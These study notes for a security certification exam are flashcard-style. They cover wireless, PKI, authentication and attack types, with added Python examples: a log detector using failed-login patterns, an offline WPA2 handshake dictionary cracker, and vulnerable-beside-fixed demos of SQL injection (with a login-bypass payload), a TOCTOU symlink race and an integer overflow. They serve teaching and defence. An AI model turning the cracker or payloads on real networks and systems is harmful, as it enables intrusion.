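"""Signature vs anomaly detection over sample auth log lines. Added example;
log lines and baseline are constructed."""
import re
import statistics
from collections import Counter

# Constructed sshd-style log lines.
LOG = """\
Jan 10 09:01:12 host sshd[1001]: Accepted publickey for alice from 10.0.5.20 port 50122
Jan 10 09:02:40 host sshd[1002]: Failed password for bob from 10.0.5.21 port 50211
Jan 10 09:02:55 host sshd[1003]: Accepted password for bob from 10.0.5.21 port 50214
Jan 10 09:10:01 host sshd[1010]: Failed password for invalid user admin from 203.0.113.7 port 40001
Jan 10 09:10:02 host sshd[1011]: Failed password for invalid user admin from 203.0.113.7 port 40002
Jan 10 09:10:03 host sshd[1012]: Failed password for root from 203.0.113.7 port 40003
Jan 10 09:10:04 host sshd[1013]: Failed password for root from 203.0.113.7 port 40004
Jan 10 09:10:05 host sshd[1014]: Failed password for root from 203.0.113.7 port 40005
Jan 10 09:10:06 host sshd[1015]: Failed password for root from 203.0.113.7 port 40006
Jan 10 09:11:00 host sshd[1016]: Accepted password for root from 203.0.113.7 port 40007
""".splitlines()

# Signatures: known-bad patterns. Policy says root never logs in with a password.
SIGNATURES = {
    "root-password-login": re.compile(r"Accepted password for root from (\S+)"),
    "invalid-user-probe": re.compile(r"Failed password for invalid user \S+ from (\S+)"),
}

FAILED = re.compile(r"Failed password for .* from (\S+)")

# Baseline: failed logins per source per hour over a quiet week (constructed).
BASELINE_FAILS_PER_SOURCE = [0, 1, 0, 2, 1, 0, 1, 1, 0, 2]


def signature_alerts(lines):
    """One alert per (signature, source) hit, in log order."""
    alerts = []
    for line in lines:
        for name, pattern in SIGNATURES.items():
            m = pattern.search(line)
            if m:
                alerts.append((name, m.group(1)))
    return alerts


def anomaly_alerts(lines, baseline=BASELINE_FAILS_PER_SOURCE, sigmas=3):
    """Sources whose failed-login count exceeds mean + sigmas * stddev of baseline."""
    mean = statistics.mean(baseline)
    threshold = mean + sigmas * statistics.pstdev(baseline)
    counts = Counter(m.group(1) for m in map(FAILED.search, lines) if m)
    return [(src, n) for src, n in counts.items() if n > threshold]


if __name__ == "__main__":
    print(signature_alerts(LOG))
    print(anomaly_alerts(LOG))
```

Note what each engine misses: the signature engine says nothing about the six failures from 203.0.113.7 (no rule for "many failures"), and the anomaly engine says nothing about the single successful root password login (one event is not a volume anomaly). Bob's one typo stays under the threshold, which is the false-positive budget the baseline buys you.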

What is a jump server?

Allows us access to secure network zones
A highly secured, hardened device
We use SSH, a tunnel or a VPN to reach the jump server, and then connect
onward from the jump server

What standard should be used for wireless communication?

WPA3

Why is WPA2 not secure?

An attacker can capture the 4-way handshake, which contains a MIC derived from
the pre-shared key, and brute-force the passphrase offline
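Why a captured handshake is enough, as an added example in Python (not from the original notes and not aircrack-ng's or hashcat's code). It follows the 802.11i derivation: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes); PTK = PRF-512 over the two MAC addresses and nonces; the MIC in handshake message 2 is HMAC-SHA1(KCK, EAPOL frame) truncated to 16 bytes (key descriptor version 2, used with CCMP). Every handshake value, the SSID and the wordlist are constructed. The point is that nothing in the attack touches the network: every guess costs one PBKDF2 run, and with a weak passphrase a dictionary finds it.

```python
"""Offline dictionary attack on a captured WPA2-PSK 4-way handshake. Added
example; SSID, MACs, nonces, EAPOL frame and wordlist are constructed."""
import hashlib
import hmac

SSID = b"CorpWiFi"
AP_MAC = bytes.fromhex("00aabbccddee")
STA_MAC = bytes.fromhex("0011223344ff")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Constructed EAPOL-Key message 2 with its 16-byte MIC field zeroed,
# which is how the MIC is computed on both sides.
EAPOL_MSG2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 109


def pmk_from_passphrase(passphrase: bytes, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def ptk_from_pmk(pmk, ap, sta, anonce, snonce) -> bytes:
    """PRF-512: five HMAC-SHA1 blocks over the sorted MACs and nonces."""
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(5):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def mic_for(passphrase: bytes) -> bytes:
    """MIC of message 2 under a given passphrase; KCK is the first 16 PTK bytes."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC,
                       ANONCE, SNONCE)[:16]
    return hmac.new(kck, EAPOL_MSG2, hashlib.sha1).digest()[:16]


def crack(captured_mic: bytes, wordlist):
    """Entirely offline: recompute the MIC per guess until one matches."""
    for guess in wordlist:
        if hmac.compare_digest(mic_for(guess), captured_mic):
            return guess
    return None


def demo():
    captured = mic_for(b"Summer2023!")  # what a sniffer sees in message 2
    return crack(captured, [b"password", b"letmein", b"Summer2023!", b"admin123"])


if __name__ == "__main__":
    print(demo())
```

The 4096 PBKDF2 iterations are the only brake, and GPUs run that in the hundreds of thousands of guesses per second. WPA3's SAE replaces this with an exchange where an offline capture yields nothing to test guesses against.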
Why is WPA3 more secure than WPA2?
Includes mutual authentication
Creates a shared session key without sending that key across the network
No more 4-way handshake capture, no hashes to crack, no offline brute-force
attacks
Adds perfect forward secrecy

What is SAE?
Simultaneous Authentication of Equals - both sides derive a shared key from the
pre-shared password without ever sending it across the network
Based on a Diffie-Hellman key exchange (the "dragonfly" handshake)

What is WPS?
Wi-Fi Protected Setup
Allows easy setup of a mobile device (NFC, PIN, or pushing a button on the
access point)
It's not really secure and better turned off, as the PIN is easily cracked

What is EAP?
Extensible Authentication Protocol - an authentication framework used for Wi-Fi
PEAP (Protected EAP) is the secure variant: the EAP exchange runs inside a TLS
tunnel

How many satellites do you need to pinpoint someone's location?

4

What do we use to protect our network from personal devices?

Mobile device management (MDM) - we can set policies on apps, data, camera, etc.
What is mobile content management?
Secure access to data
File sharing and viewing
Ensures data is encrypted on the mobile devices

What is geolocation?
Precise tracking details - find your phone, find you
May be managed by MDM
We can apply geofencing - disable the camera when we are inside the office, for
example

What is context-aware authentication?

Combine multiple contexts before granting access
Where you normally log in from (IP address)
GPS location
Other devices that might be paired

What is containerization in the context of mobile devices?

The device is split into two pieces: a managed container for company apps and
data, and a separate space for private data. The company can wipe its container
without touching personal data.

What is a MicroSD HSM?

A hardware security module in MicroSD form factor
Provides encryption, key generation, digital signatures, authentication
Can store cryptocurrency wallets

What is Unified Endpoint Management?

Manage mobile and non-mobile devices from one place
The end user can use different devices; we know each is secure and is running
approved applications
What is mobile application management?
Provision, update and remove apps
We can create an app catalog from which all applications are downloaded
We can monitor application use and remotely wipe application data

What is rooting/jailbreaking?
Gaining administrative (root) access to the operating system on a mobile phone
Apps can be sideloaded directly without going through the app store, and MDM
controls can be bypassed

Mobile deployment models

BYOD - Bring your own device. The employee owns the device; difficult to secure

COPE - Corporate owned, personally enabled. The company buys the device and
keeps full control of it; corporate information is protected and personal use
is allowed

CYOD - Choose your own device. The company purchases the device, but the
employee picks it from an approved list

Corporate-owned - The company owns the device and controls the content on it.
You need another phone for personal use

VDI / VMI - Virtual desktop infrastructure or virtual mobile infrastructure.
Data is stored securely and centrally; we access it remotely and nothing is
saved locally.

What is identity and access management (IAM)?

We control who gets access and to what
Map job functions to roles
Provides access to cloud resources - we set policies
Centralized accounts

Types of encryption in the cloud

Server-side encryption - the data is encrypted in the cloud when it is stored
on disk
Client-side encryption - we encrypt the data locally and send it to the cloud
already encrypted.

What is replication?
Copying data from one place to another
Used for disaster recovery and high availability

What is dynamic resource allocation?

Provisioning resources when they are needed - based on demand in the cloud
We spin compute instances up and down automatically

What security protocol does WPA2 use?

CCMP (Counter Mode with CBC-MAC Protocol), an AES block cipher mode

What is the difference between WPA2 and WPA3 with regards to protocol?

WPA2 uses AES in CCMP mode: counter mode for confidentiality with a message
integrity check (MIC) from CBC-MAC.
WPA3 uses AES in GCMP mode (Galois/Counter Mode), with the message integrity
check provided by the Galois Message Authentication Code (GMAC).

What is a cloud access security broker (CASB)?

Clients are on the local network and the data is in the cloud.
Sits between them and allows us to control what data can be transferred and to
enforce policy on cloud application use

What can a Next-Gen secure web gateway do?

Goes beyond URLs and GET requests
Examines the application API calls and JSON strings and allows or disallows
certain activities
Who is an identity provider?
A service that vouches for you
Commonly used by SSO applications or as part of an authentication process
It associates the employee with their attributes - name, email address, phone
number, employee ID

What can a digital certificate assigned to a person or device provide?

It binds a public key to that person or device, signed by a CA. The holder has
the matching private key and can therefore decrypt data sent to them and create
digital signatures

What is PKI?
Public key infrastructure - the policies, procedures, hardware and software for
creating, distributing, storing and revoking digital certificates

How to set up SSH key-based authentication on Linux?

ssh-keygen -t ed25519      # creates ~/.ssh/id_ed25519 (private) and id_ed25519.pub
ssh-copy-id user@host      # appends the public key to ~/.ssh/authorized_keys on host
ssh user@host              # now authenticates with the key instead of a password
Afterwards set PasswordAuthentication no in /etc/ssh/sshd_config on the host
so that the password path is closed

Different types of accounts on an operating system

User - personal account with specific privileges

Shared - difficult to manage and audit; you can't know who did what

Guest account - usually has no password but is very restricted

Service account - each service should have its own account, with no
interactive user login

Privileged account - elevated access as root or admin. It needs to be secured
with 2FA and regular password changes. We should only log in to it when we need
to make changes and use our normal account the rest of the time
What are some account policies?
Password policies - complexity, length
Account lockout policies
Disable the account when someone leaves the company
Geolocation policies - allow login only from certain countries

What is knowledge-based authentication?

During login we are asked personal questions and have a limited time to answer
them
Often used for account recovery

What is PAP?
Password Authentication Protocol - a basic authentication method
Weak scheme - the password crosses the link with no encryption
The application would need to provide its own encryption

What is CHAP and how does it work?

Challenge-Handshake Authentication Protocol
Three-way handshake: the server sends a random challenge, the client replies
with a hash of (identifier, shared secret, challenge), and the server checks it.
The secret itself never crosses the link.
Challenge/response repeats periodically during the connection
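The CHAP exchange with both sides, as an added example in Python (not from the original notes). It follows RFC 1994: response = MD5(identifier || secret || challenge). The peer name, the shared secret and the random challenge are constructed. The authenticator consumes each challenge once, which is what stops a sniffed response from being replayed, and a fresh challenge during the session is what the periodic re-authentication relies on.

```python
"""CHAP (RFC 1994) authenticator and peer. Added example; secret and names
are constructed."""
import hashlib
import hmac
import os

SHARED_SECRET = b"correct horse battery staple"  # provisioned on both ends


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """MD5 over identifier || secret || challenge, as the RFC specifies."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class Authenticator:
    """Server side: issues challenges, checks responses, never sends the secret."""

    def __init__(self, secrets):
        self.secrets = secrets        # peer name -> secret
        self.outstanding = {}         # identifier -> challenge awaiting a response
        self.next_id = 1

    def challenge(self):
        ident = self.next_id
        self.next_id = (self.next_id + 1) % 256  # 8-bit identifier field
        chal = os.urandom(16)
        self.outstanding[ident] = chal
        return ident, chal

    def verify(self, ident: int, name: str, response: bytes) -> bool:
        chal = self.outstanding.pop(ident, None)  # each challenge is single-use
        if chal is None or name not in self.secrets:
            return False
        expected = chap_response(ident, self.secrets[name], chal)
        return hmac.compare_digest(expected, response)


class Peer:
    """Client side: only ever sends a hash, never the secret."""

    def __init__(self, name, secret):
        self.name, self.secret = name, secret

    def answer(self, ident, challenge):
        return self.name, chap_response(ident, self.secret, challenge)


def run_exchange(peer_secret=SHARED_SECRET):
    server = Authenticator({"router1": SHARED_SECRET})
    peer = Peer("router1", peer_secret)
    ident, chal = server.challenge()               # 1. Challenge
    name, resp = peer.answer(ident, chal)          # 2. Response
    first = server.verify(ident, name, resp)        # 3. Success / Failure
    replayed = server.verify(ident, name, resp)     # same response sent again
    return first, replayed


if __name__ == "__main__":
    print(run_exchange())
```

The weakness the exam cares about is visible here too: the authenticator must store the secret in clear (or reversibly) to recompute the hash, and MD5 is fast enough that a captured challenge/response pair can be attacked offline with a dictionary, much like the WPA2 handshake.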

Different types of authentication systems

RADIUS
TACACS+
Kerberos
802.1X

How does authentication with Kerberos work?

The client authenticates once to the Key Distribution Center (KDC) and receives
a ticket-granting ticket (TGT). To reach a service it presents the TGT and gets
a service ticket, which it hands to the service. The password is never sent
over the network, the service also proves itself to the client (mutual
authentication), and the tickets give single sign-on.

What is an open standard for authentication and authorization on the internet?

SAML - not designed for mobile apps

How does SAML work?

The client requests a resource from the resource server > it responds with a
SAML request > the client authenticates with the authorization server > the
authorization server responds with a SAML token > the client provides the token
to the resource server
What is used instead of SAML nowadays?
OAuth - used together with OpenID Connect, which handles the authentication
OAuth - provides authorization to the application
We can limit what the given application can use and have access to

What is mandatory access control?

The operating system limits the operations on an object based on security
clearance levels
Every object gets a label, and users cannot change the labels

What is discretionary access control?

Used in most operating systems
You create a spreadsheet and, as the owner, you control who has access to it

What is role-based access control?

You have a role in your organization and you are assigned rights based on that
role.

What is attribute-based access control?

Access may be based on many different criteria
- resource information, IP address, time of day, desired action, relationship to
the data

What are important certificate attributes?

Common name - CN
Subject alternative name - additional host names for the certificate
Expiration
What is the difference between DV and EV certificates?
DV - domain validation - the certificate owner has shown some control over a
DNS domain
EV - extended validation - additional checks have verified the certificate
owner's identity

Different types of certificates

Root certificate - everything starts here; we usually keep the root CA offline.
It needs to be secured so that it is never compromised

Self-signed certificates - internal; your company is the only one going to
trust them

Machine and computer certificates - used by management software; we can
validate that the hardware is ours

Email certificates - use cryptography in an email platform: encrypting emails,
digital signatures

User certificates - an additional authentication factor, often on physical
smart cards

What is the standard format for digital certificates?

X.509

Different types of formats for certificates

DER - binary format, often used with Java
PEM - Base64-encoded DER certificate with BEGIN/END header lines
CER - extension used primarily on Windows; encoded as DER or as ASCII PEM;
usually contains only the certificate (public key), not the private key
PKCS #12 (.p12/.pfx) - stores many certificates and private keys in the same
password-protected container
PKCS #7 (.p7b file) - certificate chains; private keys are not included.
Supports MS Windows and Java Tomcat. Base64 text, so human readable

How do you check if a certificate was revoked?

Through a CRL (certificate revocation list) or OCSP - Online Certificate Status
Protocol
With OCSP stapling the certificate holder fetches its own status response from
the CA and "staples" it into the SSL/TLS handshake, so the client doesn't have
to contact the CA

How do we confirm that we are really communicating with the intended server?

We can use pinning - the expected certificate (or its hash) is built into the
application. If the certificate presented by the server doesn't match, the
application can refuse the connection

Different PKI trust relationships

Single CA
Hierarchical - a single root CA issues certificates to intermediate CAs
Mesh - CAs cross-certify each other
Web of trust - if A trusts B and B trusts C, A will trust C
Mutual authentication - the server authenticates to the client and the client
authenticates to the server

What is certificate chaining?

Any certificate between the SSL/TLS certificate and the root certificate is a
chain (intermediate) certificate; the client validates each link up to a
trusted root

What are some reconnaissance tools?

Traceroute / tracert - path to a host
NSlookup - slowly being replaced by dig. Finds DNS servers and IP addresses
Dig - DNS queries
ipconfig / ifconfig - information about our own network adapters
Ping - troubleshooting tool
Netstat - network statistics
Arp - MAC addresses
Route - routing table
Curl - retrieve raw HTTP responses and page source from a web server
hping - ping with control over TCP, UDP, ports and flags
Nmap - port scanning
theHarvester - scrapes information from Google, Bing or DNS brute force - VPN,
chat, mail, partner hosts
Sn1per - combines many recon tools: Metasploit, nmap, theHarvester and much more
Scanless - run port scans from a different host
Dnsenum - find host names and information about DNS servers
Nessus - vulnerability scanning
Cuckoo - sandbox for malware analysis

What application to use to capture packets on the network?

Wireshark
tcpdump - gather packets from the command line
tcpreplay - resend captured traffic across the network

What is the command "dd" used for?

Creating a bit-by-bit copy of a file or an entire disk (for example dd
if=/dev/sda of=/mnt/evidence/disk.img bs=4M conv=noerror,sync), then hashing
both to prove the image matches

How to capture what is in memory?

memdump

What is WinHex used for?

Universal hexadecimal editor
Edit disks, files, RAM
Disk cloning, secure wipe

What is FTK Imager?

AccessData's forensic drive imaging tool

What is Autopsy used for?

To extract many different data types:
Downloaded files
Browser history and cache
Email messages
Databases

Which standard describes how to respond to an incident?

NIST SP 800-61

What is a tabletop exercise?

We are not doing a physical drill; we talk through what we would do if an
incident happened.

What are the parts of the diamond model of intrusion analysis?

Adversary, capability, infrastructure and victim: the four vertices of the
diamond, with each event linking them
What standard is used as guidelines for evidence collection and archiving?
RFC 3227

What are some control types?

Preventive - physically controls access: door lock, firewall
Detective - may not prevent access; identifies and records (motion detector,
IDS)
Corrective - designed to mitigate damage: an IPS can block an attacker
Deterrent - may not directly prevent access; discourages an intrusion
Compensating - doesn't prevent the event; restores using other means: hot site,
backup power

What is GDPR?
General Data Protection Regulation - people inside the EU can decide where
their data goes

What is PCI DSS?

Payment Card Industry Data Security Standard - protecting credit card data

What are some security frameworks (standards) that you can apply?

CIS - Center for Internet Security
NIST RMF - National Institute of Standards and Technology Risk Management
Framework (mandatory for US federal agencies and organizations that handle
federal data)
NIST CSF - Cybersecurity Framework - a voluntary commercial framework
ISO/IEC 27001 - standard for an information security management system
ISO/IEC 27002 - code of practice for information security controls
ISO/IEC 27701 - privacy information management system
ISO 31000 - international standard of risk management practices
CSA - Cloud Security Alliance
What are some personnel policy techniques?
Job rotation, mandatory vacations, clean desk policy, dual control, separation
of duties (a single person doesn't hold all of the details), background checks,
social media analysis, onboarding, offboarding

What are some risks that a company needs to assess?

External threats
Internal threats
Legacy systems
Intellectual property (IP) theft
Software compliance

What is a risk matrix?

A grid of likelihood against impact (for example low/medium/high on each axis)
used to rank risks and decide which to treat first

Different types of audit risk models

Inherent risk - impact + likelihood; the risk that exists in the absence of
controls
Residual risk - inherent risk + control effectiveness; the risk that remains
after controls are considered
Risk appetite - the amount of risk an organization is willing to take
Data classification
Public - no restriction on viewing the data
Private - restricted access; may require a non-disclosure agreement
Sensitive - intellectual property
Confidential - very sensitive; must be approved to view
Critical - data that should always be available
Financial information - customer financial details
Government data - may be protected by law
Customer - may include user-specific details

What is data minimization?

Minimal data collection - some information may not be required

What is the most common social engineering attack related to computer security?

Phishing

What is a watering hole attack?

A watering hole attack infects a website the targets are known to visit with
malware. In some detected cases the infection was constrained to a specific
geographical area. These are not simple attacks, yet they can be very effective
at delivering malware to specific groups of end users.

Difference between viruses, worms and trojans?

Virus - reproduces by attaching itself to other files or programs and needs a
user action to run

Trojan - a standalone program that must be copied and installed by the user;
it must be "brought inside" the system by an authorized user.

Worm - acts like a virus but can travel without human action. It does not need
help to spread.
What is a fileless virus?
A piece of malware that operates only in memory and never touches the
filesystem

What are five types of rootkits?

Firmware, virtual, kernel, library and application level

How to prevent SQL injection attacks?

Parameterized queries (prepared statements), input validation, stored
procedures, and a least-privilege database account for the application
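The vulnerable query next to the fixed one, as an added example in Python (not from the original notes). It serves both the WAF card earlier (allow or deny based on expected input) and this card: a string-concatenated login query that an attacker bypasses with a comment, a parameterized version that binds the same input as data, and the allow-list check a WAF or input filter would apply. It uses the standard-library sqlite3 module with a constructed in-memory users table, so it runs with no database server.

```python
"""SQL injection: vulnerable beside fixed. Added example; table and
credentials are constructed."""
import re
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "s3cret", "admin"),
        ("bob", "hunter2", "user"),
    ])
    return db


def login_vulnerable(db, username, password):
    """String concatenation: attacker input becomes part of the SQL text."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()


def login_safe(db, username, password):
    """Parameterized query: values are bound by the driver, never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()


USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def waf_allows(username):
    """Allow-list validation: only what a username is expected to look like."""
    return bool(USERNAME_RE.match(username))


def demo():
    db = make_db()
    payload = "alice' --"   # closes the string, comments out the password check
    return {
        "vulnerable": login_vulnerable(db, payload, "wrong"),
        "safe": login_safe(db, payload, "wrong"),
        "waf": waf_allows(payload),
        "legit": login_safe(db, "alice", "s3cret"),
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable query becomes `... WHERE username = 'alice' --' AND password = 'wrong'`, and everything after `--` is a comment, so alice's admin row comes back without her password. The parameterized version looks for a user literally named `alice' --` and finds nothing. Input validation is a second layer, not a substitute: the binding is what removes the bug. (Storing passwords in clear, as this toy table does, is its own problem; the example is about the query only.)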

What is a DLL?
A dynamic-link library is a piece of code that adds functionality to a program
through library routines linked at runtime (and, if an attacker can plant one
where the program looks first, a route for DLL injection).

What can an XML injection attack do?

XML that is maliciously altered can effect changes in configurations, changes
in data streams, changes in outputs, all from the injection.

What can race conditions be used for?

Race conditions can be used for privilege elevation and denial-of-service
attacks.
Programmers can use reference counters, kernel locks, and thread
synchronization to prevent race conditions.

What is a time of check/time of use attack?

A time of check/time of use (TOCTOU) attack takes advantage of the gap between
the moment a program checks a value and the moment it uses the value, allowing
an unauthorized manipulation in between that affects the outcome of the
process.
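The classic file-system TOCTOU, vulnerable beside fixed, as an added example in Python (not from the original notes). A service checks that a path names a regular file and then opens it by name; between the two steps the attacker replaces the path with a symlink to a protected file. The attacker's move is simulated by a hook called inside the race window so the outcome is deterministic, and all paths live in a temporary directory the example creates (POSIX only, since it relies on symlinks and O_NOFOLLOW).

```python
"""TOCTOU race on a file path, vulnerable beside fixed. Added example; the
attacker's action is simulated by a hook and all files are constructed."""
import os
import stat
import tempfile


def read_vulnerable(path, attacker_hook):
    # Check by path name ...
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError("not a regular file")
    attacker_hook()                        # ... race window ...
    # ... then use the path name again: it may now point somewhere else.
    with open(path, "rb") as f:
        return f.read()


def read_safe(path):
    # Open first, refusing to follow a link, then check the object actually opened.
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        st = os.fstat(fd)                  # fstat on the descriptor, not stat on the name
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("not a regular file")
        return os.read(fd, 4096)
    finally:
        os.close(fd)


def demo():
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "shadow")       # stands in for /etc/shadow
        target = os.path.join(d, "upload.txt")   # attacker-controlled path
        with open(secret, "wb") as f:
            f.write(b"root:$6$hash...")
        with open(target, "wb") as f:
            f.write(b"harmless")

        def swap():                              # attacker wins the race
            os.remove(target)
            os.symlink(secret, target)

        leaked = read_vulnerable(target, swap)   # follows the new symlink

        results = {"vulnerable": leaked}
        try:
            read_safe(target)                    # target is now a symlink
            results["safe"] = "opened"
        except OSError as e:                     # ELOOP from O_NOFOLLOW
            results["safe"] = type(e).__name__
        return results


if __name__ == "__main__":
    print(demo())
```

The fix is the general rule for this class of bug: make the check on the object you hold (the file descriptor), never on the name you looked it up by. Where a name has to be used, dropping privileges before opening, or opening relative to a directory descriptor with openat(), closes the same window.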
Against what types of attacks is input validation good?
Buffer overflow, reliance on untrusted inputs in a security decision, cross-site
scripting (XSS), cross-site request forgery (XSRF), path traversal, and
incorrect calculation of buffer size.

What is an integer overflow?

An integer overflow is a programming error condition that occurs when a
program attempts to store an integer value in a variable that is too small to
hold it; the value wraps around, which can silently defeat a bounds check.
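The "incorrect calculation of buffer size" case from the list above, as an added example in Python (not from the original notes). Python integers never wrap, so the C-style 32-bit arithmetic is simulated with a mask; that wrap is what lets an attacker-chosen length pass a `length + header <= buffer_size` check in C code. Sizes and the header constant are constructed.

```python
"""Integer overflow defeating a buffer-size check. Added example; 32-bit wrap
is simulated with a mask, sizes are constructed."""
U32 = 0xFFFFFFFF
HEADER = 16
BUFFER_SIZE = 1024


def u32(x):
    """What a uint32_t holds after the operation: the low 32 bits."""
    return x & U32


def copy_vulnerable(length):
    """C idiom: if (len + HEADER <= BUFFER_SIZE) memcpy(buf, data, len);"""
    if u32(length + HEADER) <= BUFFER_SIZE:      # wrapped sum passes the check
        return "copy %d bytes into %d-byte buffer" % (length, BUFFER_SIZE)
    return "rejected"


def copy_safe(length):
    """Compare the operand against the remaining space; no addition to wrap."""
    if length <= BUFFER_SIZE - HEADER:
        return "copy %d bytes into %d-byte buffer" % (length, BUFFER_SIZE)
    return "rejected"


def demo():
    evil = U32 - 8                       # 0xFFFFFFF7: adding 16 wraps to 7
    return {"vulnerable": copy_vulnerable(evil), "safe": copy_safe(evil),
            "wrapped_sum": u32(evil + HEADER)}


if __name__ == "__main__":
    print(demo())
```

The vulnerable branch would then copy four gigabytes into a one-kilobyte buffer. Compilers and sanitizers (for example -fsanitize=unsigned-integer-overflow in clang) can flag the wrap, but the durable fix is to write the comparison so that no attacker-controlled addition happens before it.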

Difference between server-side request forgery and cross-site request forgery

Server-side request forgery - exploits the trust relationship between the
server and its back-end targets, forcing the vulnerable application to make
requests (for example to internal services or cloud metadata endpoints) on the
attacker's behalf.

Cross-site request forgery - performed against sites that have an
authenticated user; it exploits the site's trust in a previous authentication
event. By tricking the user's browser into sending an HTTP request to the
target site, the trust is exploited. Assume your bank lets you log in and
perform financial transactions but does not validate each subsequent
transaction separately. If the user is logged in and has not closed their
browser, an action in another browser tab could send a hidden request to the
bank, resulting in a transaction that appears to be authorized but was not done
by the user.

What does resource exhaustion cause?

The system crashes or stops responding - it is no longer available

What is refactoring?
Refactoring is the process of restructuring existing computer code without
changing its external behavior.
Difference between a rogue access point and an evil twin?
A rogue AP is an AP placed on an internal network, either by accident or for
nefarious reasons. It is not administered by the network owner or
administrator. An evil twin is an AP that appears to be legitimate but isn't,
and is often used to eavesdrop on wireless communications.

Difference between bluesnarfing and bluejacking

Bluejacking is the sending of unauthorized data via Bluetooth, whereas
bluesnarfing is the unauthorized taking of data over a Bluetooth channel

What is an Initialization Vector (IV)?

The initialization vector is used in wireless systems as the randomization
element at the beginning of a connection. WEP's short, reused 24-bit IV is
what made it breakable.

How does a SYN flood attack work?

The victim is flooded with fake SYN requests from spoofed, non-existent IP
addresses. The server eventually times out each half-open connection because
the ACK never arrives, but if enough requests are sent before they time out,
the connection table fills and service is denied.

How does a ping of death attack work?

A ping packet is sent that, once reassembled, is larger than the maximum IP
packet size of 65,535 bytes, crashing vulnerable stacks

How to block the newer form of reflection attack that uses CLDAP?

In this attack, the attacker asks for all the information on all accounts in
Active Directory, with the request spoofed so the large answer goes to the
victim machine. Because the request appears to come from a legitimate
requestor, the data is sent to the victim.
A UDP port 389 request will have a source IP from inside the network, yet it
arrives from outside the network. Blocking this port on the inbound firewalls
blocks this attack.

What is the goal of Advanced Persistent Threats (APTs)?

The tactics, tools, and procedures of APTs are focused on maintaining
administrative access to the target network and avoiding detection. Then, over
the long haul, the attacker can remove intellectual property and more from the
organization, typically undetected.

What is one of the hardest threats that security professionals will have to
address?

Insiders

What are Public/Private Information Sharing Centers?

Privately run, but government approved, industry-based cybersecurity centers.

Real-time information can be shared between members.

Difference between dark web and deep web?

The deep web is the part of the Internet that is not indexed by search
engines. One example is material that requires you to log in to an account
before it is exposed. The deep web is readily accessible to a browser, but only
with specific information such as a login. The dark web is different: it
requires special software (such as Tor) to reach at all.

What is the shortcoming of academic journals?

Publishing a paper in an academic journal can take from a year to 18 months at
the minimum, after the work is done.
Academics deconstruct an issue to its base components to find an answer, but
whether that answer is applicable in real life is a totally different issue.

Advantages of local industry groups

First, they are a good source of practical information concerning threats,
threat actors, and what can be done to defend networks.

Second, they are a solid networking source that enables one to get answers to
questions that have been vetted by others in similar positions.

Difference between end of life and end of support?

End of support - the vendor no longer provides patches or service
End of life - the equipment is no longer manufactured or sold

What is data exfiltration?

Exporting of stolen data from an enterprise

What is data loss?

Data loss is when an organization actually loses information

What is a data breach?

Data breaches are the release of data to unauthorized parties.

What is the financial risk associated with vulnerabilities?

Regulatory fines and penalties
Loss of revenue due to downtime
What are direct third-party risks?
System integration
Supply chain
Vendor management

What is intelligence fusion?

Intelligence fusion is a process involving collecting and analyzing threat
feeds from both internal and external sources on a large scale.

What are advisories and bulletins?

Advisories and bulletins are published sets of information from partners, such
as security vendors, industry groups, the government, information-sharing
groups, and other sources of "trusted" information. These are external sources
of threat feeds and need to be processed by security personnel to determine
their applicability and how to use them to improve defenses for the enterprise.

What is maneuvering?
Maneuvering is a defensive tactic used by security professionals to disrupt or
prevent an attacker from moving laterally as part of the attack chain.

Attackers move deeper into the network in search of sensitive data and other
high-value assets.

Difference between false positives and false negatives

A false positive occurs when expected or normal behavior is wrongly identified
as malicious. A failed login followed by a successful login being labeled as
malicious, when the activity was caused by a user making a mistake after
recently changing their password, is an example of a false positive.

When an intrusion detection system (IDS) does not generate an alert for a
malware attack, this is a false negative.
What range is used for CVSS scores?
The score ranges from 0.0 to 10.0. As it increases, so does the severity of
the vulnerability.

On which port does a syslog server listen?

UDP 514, or TCP 6514 for syslog over TLS

What is sentiment analysis?

Sentiment analysis is used to identify and track patterns in human emotions,
opinions, or attitudes that may be present in data.

What is the downside of credentialed scanning?

The inability to scale across multiple systems

What are the advantages of penetration testing?

Penetration tests are focused efforts to determine the effectiveness of the
security controls used to protect a system.

Difference between horizontal and vertical privilege escalation?

In horizontal privilege escalation, the attacker expands their reach by taking
over another account at the same level and misusing the legitimate privileges
granted to that user.

In vertical privilege escalation, the attacker attempts to gain more
permissions or higher-level access with an account they have already
compromised.
What is persistence?
Persistence is the ability to keep access beyond a machine reboot or after a
disconnection.

What is the difference between pivoting and lateral movement?

The purpose of lateral movement is to go to where the data is, and pivoting
(routing further attacks through a compromised host) is one of the key methods
of reaching the next system.

What is footprinting?
Footprinting is the first step in gaining information on a network during the
reconnaissance process.

What is data sovereignty?

Data sovereignty laws apply to data that is stored in a specific country. For
example, if data is stored in the EU, then EU laws and privacy regulations
apply to how that data is stored and handled.

How can we protect data in processing?

We use protected memory schemes and address space layout randomization (ASLR)

2 types of TLS inspection

Server protection - inspects incoming connections to the servers

Client protection - inspects outgoing TLS connections initiated by clients
inside the network.
